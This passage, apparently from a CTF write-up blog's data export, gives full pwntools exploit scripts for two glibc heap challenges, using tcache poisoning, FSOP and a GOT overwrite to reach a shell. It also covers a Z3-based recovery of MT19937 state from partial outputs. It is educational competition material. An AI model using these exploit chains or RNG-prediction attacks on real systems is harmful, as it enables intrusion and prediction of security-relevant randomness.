poisoned fd 0x140: p64(0) + p64(0x31), # note1 chunk header 0x150: p64(mangle(0, heap_base + 0x3F0)), # fd → NULL 0x180: bytes(fp), # fake FILE at heap+0x420 0x268: wide_data, # fake _wide_data 0x350: wide_vtable, # fake wide vtable }, filler=b\u0026#39;\\x00\u0026#39;, length=0x3C0) create(io, 0, 4, o2) # ── Phase 5: Trigger FSOP ── delete(io, 0) create(io, 0, 0x20, b\u0026#39;Z\u0026#39; * 0x18) # consume first tcache[0x30] entry # Second malloc returns _IO_list_all, write fake_file_addr # Pad to 0x18 bytes so read() doesn\u0026#39;t consume the exit command create(io, 1, 0x20, p64(fake_file_addr).ljust(0x18, b\u0026#39;\\x00\u0026#39;)) # exit() → _IO_flush_all → FSOP → system(\u0026#34; sh\u0026#34;) io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;4\u0026#39;) io.sendline(b\u0026#39;echo PWNED\u0026#39;) io.recvuntil(b\u0026#39;PWNED\u0026#39;, timeout=3) log.success(\u0026#39;Got shell!\u0026#39;) io.sendline(b\u0026#39;cat /app/flag.txt\u0026#39;) io.interactive() libc GOT overwrite (intended) # The intended solution, much shorter since there\u0026rsquo;s no FILE struct construction:\nfrom pwn import * context.arch = \u0026#39;amd64\u0026#39; exe = ELF(\u0026#39;./chall_patched\u0026#39;, checksec=False) libc = ELF(\u0026#39;./libc.so.6\u0026#39;, checksec=False) context.binary = exe UNSORTED_FD = 0x21ace0 # main_arena + 96 (unsorted bin fd) mangle = lambda ptr, pos: ptr ^ (pos \u0026gt;\u0026gt; 12) def create(io, idx, size, data): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;1\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) io.sendlineafter(b\u0026#39;Size: \u0026#39;, str(size).encode()) io.sendafter(b\u0026#39;Data: \u0026#39;, data) def delete(io, idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;2\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) def show(io, idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;3\u0026#39;) io.sendlineafter(b\u0026#39;Index: \u0026#39;, str(idx).encode()) return io.recvline(keepends=False) io = remote(\u0026#39;chall.lac.tf\u0026#39;, 31144) if args.REMOTE else process([exe.path]) # ── Phase 1: Fill tcache[0x200] + push one to unsorted bin ── for i in range(8): create(io, 0, 0xc, b\u0026#39;X\u0026#39;) create(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 0) overflow = b\u0026#39;A\u0026#39; * (0x10 + i * 0x20) overflow += p64(0x20) + p64(0x201) overflow += b\u0026#39;A\u0026#39; * 0x18 overflow += p64(0x20d31 - i * 0x20) if i == 7: overflow += b\u0026#39;A\u0026#39; * 0x1d8 overflow += p64(0x21) + b\u0026#39;A\u0026#39; * 0x18 + p64(0x21) create(io, 0, 4, overflow) delete(io, 1) delete(io, 0) # ── Phase 2: Libc leak ── create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) libc.address = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) - UNSORTED_FD log.info(f\u0026#39;{hex(libc.address)=}\u0026#39;) # ── Phase 3: Heap leak ── unsorted_fd = libc.address + UNSORTED_FD delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21) + p64(unsorted_fd) * 2 + p64(0x20) + p64(0x20c50)) create(io, 1, 0xc, b\u0026#39;X\u0026#39;) delete(io, 1) delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x100) data = show(io, 0) mangler = u64(data[0x100:].ljust(8, b\u0026#39;\\x00\u0026#39;)) log.info(f\u0026#39;{hex(mangler)=}\u0026#39;) # Fix freed chunk header delete(io, 0) create(io, 0, 4, b\u0026#39;A\u0026#39; * 0xf8 + p64(0x21)) # ── Phase 4: Tcache poisoning → strlen GOT ── delete(io, 0) create(io, 0, 0x20, b\u0026#39;X\u0026#39; * 0x18) create(io, 1, 0x20, b\u0026#39;Y\u0026#39; * 0x18) delete(io, 1) delete(io, 0) # Overflow: poison tcache fd to point at libc\u0026#39;s strlen GOT strlen_got = libc.got[\u0026#39;strncpy\u0026#39;] # strncpy and strlen GOT entries are adjacent create(io, 0, 4, b\u0026#39;A\u0026#39; * 0x118 + p64(0x31) + p64(mangle(strlen_got, mangler \u0026lt;\u0026lt; 12)) + b\u0026#39;\\x00\u0026#39;) # null byte to pass tcache key check # Consume poisoned tcache create(io, 1, 0x20, b\u0026#39;/bin/sh\\x00\u0026#39;) # first pop: normal chunk delete(io, 0) create(io, 0, 0x20, # second pop: libc GOT! p64(libc.sym[\u0026#39;strncpy\u0026#39;]) + # preserve strncpy p64(libc.sym[\u0026#39;system\u0026#39;])) # overwrite strlen -\u0026gt; system # ── Trigger: puts(\u0026#34;/bin/sh\u0026#34;) → strlen → system ── show(io, 1) io.interactive() Flag # lactf{omg_arb_overflow_is_so_powerful} ","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/lactf-26/tcademy/","section":"CTFs","summary":"Heap exploitation on glibc 2.35: integer underflow to massive heap overflow, and two paths to shell: libc GOT overwrite or House of Apple 2 FSOP.","title":"Tcademy","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/type-confusion/","section":"Tags","summary":"","title":"Type-Confusion","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/topics/web/","section":"Topics","summary":"Web exploitation, logic bugs, and application vulnerabilities.","title":"Web","type":"topics"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/yaml/","section":"Tags","summary":"","title":"Yaml","type":"tags"},{"content":"I believe I\u0026rsquo;m not that good at math at this point\u0026hellip;\nnc ahc.ctf.pascalctf.it 9003 A player management system with create, delete, and print operations. The goal: overwrite a global target variable from 0xbabebabebabebabe to 0xdeadbeefcafebabe.\nProtections: Full RELRO Stack Canary NX enabled PIE enabled Full protections, so we need a heap attack.\nSetup # The binary pre-allocates 5 chunks of size 0x48 (fitting in 0x50 tcache bin), frees them all, then allocates target:\nvoid setup_chall() { for (int i = 0; i \u0026lt; 5; i++) players[i] = malloc(0x48); for (int i = 4; i \u0026gt;= 0; i--) { free(players[i]); players[i] = 0; } target = malloc(8); *target = 0xbabebabebabebabe; } After setup, the heap looks like:\n[chunk0:0x50][chunk1:0x50][chunk2:0x50][chunk3:0x50][chunk4:0x50][target:0x20][top] └──────────────────── tcache[0x50] ────────────────────────┘ The 5 freed chunks are in tcache, and target sits right after them.\nThe vulnerability # Creating a player allocates extra + 0x48 bytes, reads a name, then reads a message:\nvoid create_player() { int extra = read_int(0, 0x20); // 0-32 void *chunk = malloc(extra + 0x48); int name_len = read_name(chunk, extra); // max length: extra + 39 if (name_len \u0026lt;= extra + 0x1f) name_len = extra + 0x20; read_message(chunk + name_len); // message written at offset name_len } The bug: with extra=0, the chunk is 0x48 bytes. If we use a max-length name (39 chars), name_len becomes 40 (0x28). The message starts at offset 0x28, leaving only 0x48 - 0x28 = 0x20 (32) bytes before we overflow into the next chunk\u0026rsquo;s metadata.\nThe message can be up to 39 bytes, so we can overflow by 7 bytes into the adjacent chunk\u0026rsquo;s size field.\nThe attack # Tcache bin confusion # The idea: corrupt a chunk\u0026rsquo;s size field so when it\u0026rsquo;s freed, it goes into the wrong tcache bin. Then reallocate it as a larger chunk that overlaps with target.\nStep by step # 1. Consume tcache entries\nfor i in range(3): create(i, 0, b\u0026#39;A\u0026#39;, b\u0026#39;B\u0026#39;) Takes chunks 0-2 from tcache[0x50]:\nHeap: ┌─────────┬─────────┬─────────┬─────────┬─────────┬─────────┐ │ chunk0 │ chunk1 │ chunk2 │ chunk3 │ chunk4 │ target │ │ (used) │ (used) │ (used) │ (free) │ (free) │ 0xbabe..│ └─────────┴─────────┴─────────┴─────────┴─────────┴─────────┘ └── tcache[0x50] ──┘ 2. Corrupt chunk4\u0026rsquo;s size\ncreate(3, 0, b\u0026#39;A\u0026#39;*39, b\u0026#39;B\u0026#39;*32 + p32(0x71)) Gets chunk3 from tcache. With a 39-byte name, message starts at offset 0x28. We write 32 \u0026lsquo;B\u0026rsquo;s (fills the remaining 0x20 bytes) plus p32(0x71) which overflows into chunk4\u0026rsquo;s header:\nchunk3 layout (0x50 total, 0x48 user data): ┌──────────────────────────────────────────────────┬─────────────────┐ │ chunk3 user data │ chunk4 header │ ├───────────────────────┬──────────────────────────┼────────┬────────┤ │ name (39 \u0026#39;A\u0026#39;s + null) │ message (32 \u0026#39;B\u0026#39;s + 0x71) │prevsize│ size │ │ offset 0x00 │ offset 0x28 │ │= 0x71! │ └───────────────────────┴──────────────────────────┴────────┴────────┘ overflow ───────────────┘ chunk4\u0026rsquo;s size field is now 0x71 instead of 0x51.\n3. Allocate chunk4 normally\ncreate(4, 0, b\u0026#39;A\u0026#39;, b\u0026#39;B\u0026#39;) Gets chunk4 from tcache. Tcache doesn\u0026rsquo;t validate size during allocation, so this works fine.\nHeap: ┌─────────┬─────────┬─────────┬─────────┬─────────┬─────────┐ │ chunk0 │ chunk1 │ chunk2 │ chunk3 │ chunk4 │ target │ │ (used) │ (used) │ (used) │ (used) │ (used) │ 0xbabe..│ │ │ │ │ │ size=71!│ │ └─────────┴─────────┴─────────┴─────────┴─────────┴─────────┘ tcache[0x50]: empty tcache[0x70]: empty 4. Free chunk4 into wrong bin\ndelete(4) When freeing, glibc reads the chunk\u0026rsquo;s size field to determine which bin. chunk4 has size 0x71, so it goes to tcache[0x70]:\nHeap: ┌─────────┬─────────┬─────────┬─────────┬─────────┬─────────┐ │ chunk0 │ chunk1 │ chunk2 │ chunk3 │ chunk4 │ target │ │ (used) │ (used) │ (used) │ (used) │ (free) │ 0xbabe..│ │ │ │ │ │ size=71 │ │ └─────────┴─────────┴─────────┴─────────┴─────────┴─────────┘ tcache[0x50]: empty tcache[0x70]: chunk4 ← wrong bin! 5. Reallocate as larger chunk\ncreate(4, 32, b\u0026#39;A\u0026#39;, p64(0xdeadbeefcafebabe)*4) With extra=32, we request 32 + 0x48 = 0x68 bytes, which needs a 0x70 chunk. malloc returns chunk4 from tcache[0x70].\nThe program thinks chunk4 is 0x70 bytes, but it\u0026rsquo;s still at its original position. This \u0026ldquo;larger\u0026rdquo; view extends into target\u0026rsquo;s memory:\nWhat the program thinks chunk4 looks like: ┌────────────────────────────────────────────────────────────────────┐ │ chunk4 as 0x70 chunk │ │ (0x60 user data) │ ├───────────────────────┬────────────────────────────────────────────┤ │ name (short) │ message written here... │ │ │ ...overwrites target! │ └───────────────────────┴────────────────────────────────────────────┘ Actual memory layout: ┌─────────────────────────────────────┬─────────────────────────────┐ │ real chunk4 (0x50) │ target chunk (0x20) │ ├─────────────────────────────────────┼──────────┬──────────────────┤ │ user data │ metadata │ *target value │ │ │ │← overwritten! │ └─────────────────────────────────────┴──────────┴──────────────────┘ The message payload p64(0xdeadbeefcafebabe)*4 (32 bytes) overwrites target\u0026rsquo;s value.\n6. Win\ncheck_target() *target is now 0xdeadbeefcafebabe. Flag!\nSolve # from pwn import * context.binary = bin = ELF(\u0026#39;./average\u0026#39;, checksec=False) io = remote(\u0026#39;ahc.ctf.pascalctf.it\u0026#39;, 9003) # io = process([bin.path]) def create(idx, extra, name, msg): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;1\u0026#39;) io.sendlineafter(b\u0026#39;: \u0026#39;, str(idx).encode()) io.sendlineafter(b\u0026#39;? \u0026#39;, str(extra).encode()) io.sendlineafter(b\u0026#39;: \u0026#39;, name) io.sendlineafter(b\u0026#39;: \u0026#39;, msg) def delete(idx): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;2\u0026#39;) io.sendlineafter(b\u0026#39;: \u0026#39;, str(idx).encode()) def check(): io.sendlineafter(b\u0026#39;\u0026gt; \u0026#39;, b\u0026#39;5\u0026#39;) # Consume tcache[0x50] entries for i in range(3): create(i, 0, b\u0026#39;A\u0026#39;, b\u0026#39;B\u0026#39;) # Overflow from chunk3 to corrupt chunk4\u0026#39;s size (0x51 -\u0026gt; 0x71) create(3, 0, b\u0026#39;A\u0026#39;*39, b\u0026#39;B\u0026#39;*32 + p32(0x71)) # Allocate chunk4 (corrupted size) create(4, 0, b\u0026#39;A\u0026#39;, b\u0026#39;B\u0026#39;) # Free chunk4 -\u0026gt; goes to tcache[0x70] delete(4) # Reallocate as 0x70 chunk, message overwrites target create(4, 32, b\u0026#39;A\u0026#39;, p64(0xdeadbeefcafebabe)*4) check() io.interactive() ","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/ahc/","section":"CTFs","summary":"Tcache bin confusion via chunk size corruption.","title":"AHC - Average Heap Challenge","type":"ctfs"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/chunk-size-corruption/","section":"Tags","summary":"","title":"Chunk-Size-Corruption","type":"tags"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/topics/crypto/","section":"Topics","summary":"Cryptography challenges, attacks, and implementations.","title":"Crypto","type":"topics"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/mt19937/","section":"Tags","summary":"","title":"Mt19937","type":"tags"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/","section":"CTFs","summary":"","title":"PascalCTF 2026","type":"ctfs"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/prng/","section":"Tags","summary":"","title":"Prng","type":"tags"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/smt-solver/","section":"Tags","summary":"","title":"Smt-Solver","type":"tags"},{"content":"","date":"1 February 2026","externalUrl":null,"permalink":"/writeups/tags/tcache/","section":"Tags","summary":"","title":"Tcache","type":"tags"},{"content":" Bored in class? Try this cryptic Wordle twist and crack the next word!\nnc wordy.ctf.pascalctf.it 5005 The challenge implements a Wordle-style game where secret words are generated by an MT19937 PRNG. To obtain the flag, we must correctly predict 5 consecutive future secrets. The twist: we only observe 20 bits of each 32-bit RNG output.\nThe attack at a high level # The core idea is simple: MT19937 is deterministic. If we can figure out its internal state, we can predict all future outputs.\nThe problem is we don\u0026rsquo;t see the full outputs. Each secret word encodes only 20 of the 32 bits the RNG produces:\ndef new_secret(): out = rng.next_u32() # 32-bit output idx = out \u0026amp; ((1 \u0026lt;\u0026lt; 20) - 1) # keep only lower 20 bits current_secret = index_to_word(idx) So we\u0026rsquo;re missing 12 bits per output. Can we still recover the state?\nYes, because MT19937\u0026rsquo;s state is heavily constrained by its structure. Even partial observations, if we collect enough of them, uniquely determine the state. We use Z3 (an SMT solver) to find a state consistent with all our observations.\nHow MT19937 works # MT19937 maintains 624 32-bit words as internal state, plus an index tracking the current position.\nGenerating output # When you call next_u32(), it:\nReads state[index] Applies a \u0026ldquo;tempering\u0026rdquo; transformation (reversible bit scrambling) Increments the index def next_u32(self): if self.index \u0026gt;= 624: self.twist() # regenerate state when exhausted y = self.mt[self.index] self.index += 1 # Tempering: reversible bit scrambling y ^= (y \u0026gt;\u0026gt; 11) y ^= ((y \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) y ^= ((y \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) y ^= (y \u0026gt;\u0026gt; 18) return y The twist operation # After 624 outputs, the state is exhausted and gets regenerated via \u0026ldquo;twist\u0026rdquo;:\ndef twist(self): for i in range(624): # Combine upper bit of state[i] with lower 31 bits of state[i+1] y = (self.mt[i] \u0026amp; 0x80000000) | (self.mt[(i + 1) % 624] \u0026amp; 0x7FFFFFFF) # XOR with state[i+397] and conditional term self.mt[i] = self.mt[(i + 397) % 624] ^ (y \u0026gt;\u0026gt; 1) if y \u0026amp; 1: self.mt[i] ^= 0x9908B0DF self.index = 0 The key observation: every operation here is XOR, AND with constants, or bit shifts. No multiplication, no addition that carries between bits. This makes the entire system linear over individual bits.\nWhy partial observations are enough # Here\u0026rsquo;s the crucial insight that makes this attack work.\nTracing bits through tempering # Let\u0026rsquo;s trace exactly what happens to the bits. Say state word mt[0] has bits we\u0026rsquo;ll call b31, b30, ..., b0. The first tempering step is:\ny = mt[0] y ^= (y \u0026gt;\u0026gt; 11) What does y ^= (y \u0026gt;\u0026gt; 11) do to each bit position?\nBefore: b31 b30 b29 ... b21 b20 b19 b18 ... b11 b10 ... b0 Shifted: 0 0 0 ... 0 b31 b30 b29 ... b22 b21 ... b11 XOR: b31 b30 b29 ... b21 X X X ... X X ... X where X means \u0026#34;XOR of two bits\u0026#34; So after this step:\nBit 20 of the output = b20 XOR b31 Bit 19 of the output = b19 XOR b30 Bit 10 of the output = b10 XOR b21 Bits 21-31 are unchanged (nothing shifts into them) Each subsequent tempering step (y ^= ((y \u0026lt;\u0026lt; 7) \u0026amp; MASK), etc.) does more mixing, but it\u0026rsquo;s always XORing bits together. After all tempering steps, each output bit is the XOR of some specific subset of the original state bits.\nFrom bits to equations # Here\u0026rsquo;s where it becomes useful. Suppose after all tempering, output bit 5 equals b17 XOR b8 XOR b3 (I\u0026rsquo;m making up the exact combination, the real one depends on all the tempering steps).\nIf we observe that output bit 5 = 1, we now know:\nb17 XOR b8 XOR b3 = 1 That\u0026rsquo;s an equation! It tells us these three state bits can\u0026rsquo;t all be the same, either one is 1 and two are 0 or all three are 1.\nEach observed bit gives us one such equation. If we observe 20 bits of output, we get 20 equations constraining the state bits.\nWhy XOR makes this \u0026ldquo;linear\u0026rdquo; # XOR has a nice property: it behaves like addition where 1+1=0 (arithmetic modulo 2). This means our equations are linear, no bit is multiplied by another bit, just added (XORed) together.\nLinear systems can be solved efficiently. Given enough equations, you can solve for all unknowns using Gaussian elimination (or in our case, Z3 does something equivalent).\nIf tempering used AND or OR in ways that weren\u0026rsquo;t masked to constants, we\u0026rsquo;d get nonlinear equations like b5 AND b3 = 1, which are much harder to solve in bulk.\nCounting constraints vs unknowns # The full state is 624 × 32 = 19968 bits. That\u0026rsquo;s what we need to determine.\nEach observation gives us 20 bits of output. Each bit is one linear equation constraining the state. So:\n624 observations → 624 × 20 = 12480 constraints (not enough) 1000 observations → 1000 × 20 = 20000 constraints (just enough) But raw constraint count isn\u0026rsquo;t the whole story. We also need the constraints to be independent, meaning they need to tell us different things about the state.\nWhy the twist helps # Before the twist, output \\(i\\) comes directly from state[i] (through tempering). Each observation only constrains bits of a single state word. If we only collected 624 observations from epoch 0, each state word would have 20 known bits and 12 unknown bits, with no way to pin down those 12 bits.\nAfter the twist, everything changes. Look at how twisted state is computed:\ntwisted[i] = state[(i + 397) % 624] ^ (y \u0026gt;\u0026gt; 1) ^ ... # where y combines state[i] and state[i+1] So twisted[i] depends on bits from state[i], state[i+1], AND state[(i+397) % 624]. Three different original state words get mixed together.\nWhen we observe output 624 (first output after twist), we\u0026rsquo;re constraining a linear combination of bits from multiple original state words. These cross-word constraints tie the whole state together into a connected system.\nWith observations spanning two twist boundaries (outputs 0-623, 624-1247, 1248+), we get a dense web of constraints where each state word is linked to many others. This makes the system fully determined despite only seeing 20 bits per output.\nWhy Z3 works here # Z3\u0026rsquo;s bitvector solver is essentially doing Gaussian elimination on a system of linear equations over bits. This isn\u0026rsquo;t brute force, it\u0026rsquo;s \\(O(n^3)\\) linear algebra, which is fast even for 20000 equations.\nIf MT19937 used multiplication or other nonlinear operations, Z3 would have to fall back to SAT solving, which could take exponential time. The linearity is what makes this tractable.\nSolving Wordle efficiently # Before recovering the RNG state, we need to extract the secrets. Brute-forcing all \\(16^5\\) possibilities per round is infeasible, but the Wordle feedback mechanism enables rapid narrowing.\nLetter enumeration strategy # We probe each letter by guessing 5 copies. For a guess like aaaaa against secret abcda:\nFeedback: G___G Every a in the secret shows as G (green) at its exact position This means we don\u0026rsquo;t actually need Yellow feedback at all. Greens tell us both which letters appear and where they are. After probing all 16 letters, we know every position for each letter. The remaining unknowns are just permutations of letters that could fit multiple positions.\nBatch sending # A key optimization: send all guesses at once instead of waiting for each response. With 1260 rounds of Wordle over a network connection, round-trip latency adds up fast.\n# Send all 16 letter probes in one batch guesses = [f\u0026#34;GUESS {c * 5}\u0026#34; for c in ALPHABET] io.sendline(\u0026#34;\\n\u0026#34;.join(guesses).encode()) # Then read all 16 responses for c in ALPHABET: fb = io.recvline().decode().split()[1] # process feedback... Same idea for candidate permutations: generate them all, send in one batch and read of G for each position.\nZ3-based state recovery # What is Z3? # Z3 is an SMT (Satisfiability Modulo Theories) solver, a tool that finds values satisfying a set of constraints, or proves no solution exists.\nThe key idea is symbolic computation: instead of calculating with concrete numbers, we describe operations on unknown variables and let Z3 figure out what those variables must be. This lets us \u0026ldquo;run MT19937 backwards\u0026rdquo;: we know the outputs, and Z3 finds the state that produced them.\nWhat \u0026ldquo;symbolic\u0026rdquo; actually means # When we write normal Python:\nx = 5 y = x ^ 3 # y is now 6 Python computes 5 ^ 3 = 6 immediately. The variable y holds the concrete value 6.\nZ3 works differently. When we create a Z3 variable:\nx = BitVec(\u0026#39;x\u0026#39;, 32) # \u0026#34;x is some unknown 32-bit value\u0026#34; This x isn\u0026rsquo;t a number. It\u0026rsquo;s a symbol representing \u0026ldquo;some 32-bit value we don\u0026rsquo;t know yet.\u0026rdquo; Now when we write:\ny = x ^ 3 Python doesn\u0026rsquo;t (can\u0026rsquo;t!) compute this, because x has no concrete value. Instead, Z3 overloads the ^ operator so that it builds an expression tree rather than computing a result. This is why the code looks like normal math, but Z3 has hijacked every operator to record what\u0026rsquo;s happening instead of actually doing it:\nXOR / \\ x 3 The variable y now holds this tree structure, not a number. If we keep going:\nz = y ^ 7 We get a bigger tree:\nXOR / \\ XOR 7 / \\ x 3 This is what \u0026ldquo;symbolic computation\u0026rdquo; means: instead of calculating results, we\u0026rsquo;re building up descriptions of how to calculate results, in terms of unknown variables.\nHow constraints work # Now comes the key part. When we write:\ns = Solver() s.add(z == 10) We\u0026rsquo;re telling Z3: \u0026ldquo;the expression (x ^ 3) ^ 7 must equal 10.\u0026rdquo; Z3 records this constraint. Later, when we call s.check(), Z3 works backwards: \u0026ldquo;what value of x makes this true?\u0026rdquo;\nFor this simple example: (x ^ 3) ^ 7 = 10 means x ^ 3 = 10 ^ 7 = 13, so x = 13 ^ 3 = 14.\nScaling up to MT19937 # The same principle applies to our attack. We create 624 symbolic variables:\nstate = [BitVec(f\u0026#39;mt_{i}\u0026#39;, 32) for i in range(N)] Each state[i] represents \u0026ldquo;the unknown \\(i\\)-th word of the MT19937 state.\u0026rdquo;\nThen we symbolically compute tempering:\ntempered = state[i] tempered = tempered ^ LShR(tempered, 11) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) tempered = tempered ^ LShR(tempered, 18) After this, tempered isn\u0026rsquo;t a number. It\u0026rsquo;s an enormous expression tree with state[i] at the leaves, describing exactly how tempering transforms that state word. (Note: LShR is Z3\u0026rsquo;s logical right shift, which fills with zeros like C does for unsigned integers. Z3\u0026rsquo;s \u0026gt;\u0026gt; operator always does arithmetic shift (copies the top bit), so 0x80000000 \u0026gt;\u0026gt; 1 would give 0xC0000000 instead of 0x40000000.)\nNow we add a constraint:\ns.add(Extract(19, 0, tempered) == observations[i]) Extract(19, 0, tempered) builds another expression: \u0026ldquo;bits 0-19 of the tempered result.\u0026rdquo; Setting it equal to our observation tells Z3: \u0026ldquo;whatever state[i] is, when you temper it and take the low 20 bits, you must get this specific value.\u0026rdquo;\nEach observation adds 20 such bit-level constraints. After 1000+ observations, Z3 has enough constraints to uniquely determine all 624 state words.\nHandling the twist # For observations 624+, the output comes from twisted state. We compute this symbolically too:\nMATRIX_A = BitVecVal(0x9908B0DF, 32) # Concrete constant, not symbolic twisted = [] for i in range(N): y = (state[i] \u0026amp; 0x80000000) | (state[(i + 1) % N] \u0026amp; 0x7FFFFFFF) twisted.append(state[(i + 397) % N] ^ LShR(y, 1) ^ If((y \u0026amp; 1) == 1, MATRIX_A, BitVecVal(0, 32))) Now twisted[i] is an expression tree involving multiple original state words: state[i], state[i+1], and state[(i+397) % 624]. The If(cond, then, else) creates a conditional expression that Z3 will resolve once it knows the bit values.\nConstraints on twisted outputs therefore link multiple state words together, creating the cross-word dependencies that make the system fully determined.\nSolving # Finally:\ns.check() # Find values satisfying all constraints return [s.model()[state[i]].as_long() for i in range(N)] Z3 internally converts all our expression trees into a system of boolean equations (one per bit) and solves via something like Gaussian elimination. Because XOR is linear, this is efficient, typically under a minute for our ~25000 equations.\ns.check() # Returns sat, unsat, or unknown return [s.model()[state[i]].as_long() for i in range(N)] s.check() runs the solver. If satisfiable, s.model() returns a mapping from symbolic variables to concrete values. We extract each state word with .as_long().\nThe solver typically finishes in under a minute because the constraint system is linear over bits (XOR-based). Z3 essentially performs Gaussian elimination on ~25000 boolean equations.\nPutting it together # Collection phase # We play 1260 rounds of Wordle, recovering each secret and extracting its 20-bit index:\nobservations = [] for i in range(1260): io.sendline(b\u0026#39;NEW\u0026#39;) io.recvuntil(b\u0026#39;ROUND STARTED\u0026#39;) secret = solve_wordle(io) observations.append(word_to_index(secret)) The choice of 1260 ensures we span two twist boundaries (twists occur at outputs 624 and 1248), maximizing constraint diversity.\nRecovery and prediction phase # With all observations collected, we recover the state and create a concrete RNG instance:\nstate = recover_state(observations) rng = MT19937(state, 0) We fast-forward past all the outputs we\u0026rsquo;ve already seen:\nfor _ in range(len(observations)): rng.next_u32() Now the RNG is positioned exactly where the server\u0026rsquo;s RNG is. The next 5 outputs will match:\nfor _ in range(5): pred = rng.next_u32() \u0026amp; 0xFFFFF io.sendline(f\u0026#39;FINAL {index_to_word(pred)}\u0026#39;.encode()) Final solve script # from pwn import * from z3 import * import itertools ALPHABET = \u0026#34;abcdefghijklmnop\u0026#34; N = 624 def index_to_word(idx): word = \u0026#34;\u0026#34; for _ in range(5): word = ALPHABET[idx % 16] + word idx //= 16 return word def word_to_index(word): x = 0 for c in word: x = x * 16 + ALPHABET.index(c) return x def solve_wordle(io): known_pos = [None] * 5 counts = {} for c in ALPHABET: io.sendline(f\u0026#39;GUESS {c * 5}\u0026#39;.encode()) io.recvuntil(b\u0026#39;FEEDBACK \u0026#39;) fb = io.recvline().decode().strip() if fb == \u0026#39;_____\u0026#39;: continue g_count = fb.count(\u0026#39;G\u0026#39;) y_count = fb.count(\u0026#39;Y\u0026#39;) total = g_count + y_count if total \u0026gt; 0: counts[c] = total for i, f in enumerate(fb): if f == \u0026#39;G\u0026#39;: known_pos[i] = c if all(p is not None for p in known_pos): return \u0026#39;\u0026#39;.join(known_pos) unknown = [i for i in range(5) if known_pos[i] is None] remaining = dict(counts) for p in known_pos: if p is not None and p in remaining: remaining[p] -= 1 if remaining[p] == 0: del remaining[p] letters = [] for c, n in remaining.items(): letters += [c] * n for perm in itertools.permutations(letters, len(unknown)): candidate = list(known_pos) for i, pos in enumerate(unknown): candidate[pos] = perm[i] word = \u0026#39;\u0026#39;.join(candidate) io.sendline(f\u0026#39;GUESS {word}\u0026#39;.encode()) io.recvuntil(b\u0026#39;FEEDBACK \u0026#39;) if io.recvline().decode().strip() == \u0026#39;GGGGG\u0026#39;: return word class MT19937: def __init__(self, state, index=0): self.mt = state[:] self.index = index def twist(self): old = self.mt[:] for i in range(N): y = (old[i] \u0026amp; 0x80000000) | (old[(i + 1) % N] \u0026amp; 0x7FFFFFFF) self.mt[i] = (old[(i + 397) % N] ^ (y \u0026gt;\u0026gt; 1) ^ (0x9908B0DF if y \u0026amp; 1 else 0)) \u0026amp; 0xFFFFFFFF self.index = 0 def next_u32(self): if self.index \u0026gt;= N: self.twist() y = self.mt[self.index] self.index += 1 y ^= (y \u0026gt;\u0026gt; 11) y ^= ((y \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) y ^= ((y \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) y ^= (y \u0026gt;\u0026gt; 18) return y \u0026amp; 0xFFFFFFFF def recover_state(observations): s = Solver() state = [BitVec(f\u0026#39;mt_{i}\u0026#39;, 32) for i in range(N)] # Epoch 0: outputs 0-623 for i in range(min(N, len(observations))): tempered = state[i] tempered = tempered ^ LShR(tempered, 11) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) tempered = tempered ^ LShR(tempered, 18) s.add(Extract(19, 0, tempered) == observations[i]) if len(observations) \u0026gt; N: # Compute twisted state symbolically MATRIX_A = BitVecVal(0x9908B0DF, 32) twisted = [] for i in range(N): y = (state[i] \u0026amp; 0x80000000) | (state[(i + 1) % N] \u0026amp; 0x7FFFFFFF) twisted.append(state[(i + 397) % N] ^ LShR(y, 1) ^ If((y \u0026amp; 1) == 1, MATRIX_A, BitVecVal(0, 32))) # Epoch 1: outputs 624-1247 for i in range(N, min(2 * N, len(observations))): idx = i - N tempered = twisted[idx] tempered = tempered ^ LShR(tempered, 11) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 7) \u0026amp; 0x9D2C5680) tempered = tempered ^ ((tempered \u0026lt;\u0026lt; 15) \u0026amp; 0xEFC60000) tempered = tempered ^ LShR(tempered, 18) s.add(Extract(19, 0, tempered) == observations[i]) if len(observations) \u0026gt; 2 * N: # Second twist twisted2 = [] for i in range(N): y = (twisted[i] \u0026amp; 0x80000000) | (twisted[(i + 1) % N] \u0026amp; 0x7FFFFFFF) twisted2.append(twisted[(i + 397) % N] ^ 